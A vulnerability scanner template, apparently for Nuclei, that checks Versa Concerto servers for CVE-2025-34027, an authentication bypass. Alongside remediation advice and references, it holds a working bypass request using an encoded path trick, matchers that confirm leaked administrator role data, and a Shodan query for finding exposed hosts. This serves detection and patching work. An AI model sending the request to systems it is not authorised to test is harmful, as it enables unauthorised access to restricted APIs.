id: CVE-2025-34027 info: name: Versa Concerto API Path Based - Authentication Bypass author: iamnoooob,rootxharsh,parthmalhotra,pdresearch severity: critical description: | Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path.This issue enabled attackers to bypass authentication controls and access restricted resources. impact: | Attackers can bypass authentication through URL path manipulation to access restricted API endpoints and retrieve sensitive role information without credentials. remediation: | Upgrade to the latest Versa Concerto version that properly handles URL decoding and path validation in authentication checks. reference: - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/ - https://versa-networks.com/documents/datasheets/versa-concerto.pdf - https://www.cve.org/CVERecord?id=CVE-2025-34027 - https://security-portal.versa-networks.com/emailbulletins/6830fa3f28defa375486ff2f classification: cve-id: CVE-2025-34027 cwe-id: CWE-367 epss-score: 0.36602 epss-percentile: 0.98335 cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:* metadata: verified: true vendor: versa-networks product: concerto max-request: 1 shodan-query: http.favicon.hash:-534530225 tags: cve,cve2025,versa,concerto,auth-bypass,vkev,vuln http: - raw: - | GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - ENTERPRISE_ADMINISTRATOR - type: word part: header words: - EECP-CSRF-TOKEN # digest: 4b0a00483046022100beea99215cd748bb409075c0d9b3d4fe6091bdf75fb32cb94e458e3e7e10202f022100d8b55e2680fa164f3001f97b25f2cd703b9059e543400e5dfcdab2289a93e0bc:922c64590222798bb761d5b6d8e72950